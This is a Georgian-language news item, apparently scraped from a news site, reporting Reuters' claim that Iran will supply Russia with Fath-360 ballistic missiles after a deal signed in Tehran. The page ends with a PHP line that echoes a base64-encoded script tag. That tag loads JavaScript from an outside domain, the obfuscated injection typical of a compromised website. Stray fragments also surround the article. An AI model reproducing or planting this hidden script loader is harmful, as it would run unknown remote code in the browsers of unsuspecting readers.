celsiusi
ავერსი შნაიდერი

 უახლოეს მომავალში ირანი რუსეთს ასობით ბალისტიკურ რაკეტას მიაწვდის, – ამის შესახებ „როიტერი“ ევროპული სადაზვერვო წყაროებზე დაყრდნობით წერს.

სააგენტოს წყაროების ცნობით, რუსული პერსონალი ამჟამად ირანში სწავლებას გადის Fath-360 ტიპის ახლო რადიუსზე მოქმედი ბალისტიკური სარაკეტო სისტემების გამოყენებისთვის. აღნიშნული ტიპის შეიარაღება სატელიტური მართვისაა, რაკეტებს, მაქსიმუმ, 120კმ მანძილის დაფარვა შეუძლიათ.

სააგენტო წერს, რომ, სავარაუდოდ, მოსკოვისთვის მათ გადაცემასთან დაკავშირებით შეთანხმებას გასული წლის 13 დეკემბერს თეირანში მოეწერა ხელი, როდესაც ირანს რუსეთის თავდაცვის სამინისტროს წარმომადგენლები სტუმრობდნენ. ამავე დროს, გაფორმდა კიდევ ერთი ბალისტიკური სარაკეტო სისტემის, „აბაბილის“ გადაცემაზე შეთანხმებაც.

„როიტერი“ აღნიშნავს, რომ ამ ინფორმაციასთან დაკავშირებით რუსეთის თავდაცვის სამინისტროში კომენტარს არ აკეთებენ.

139
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");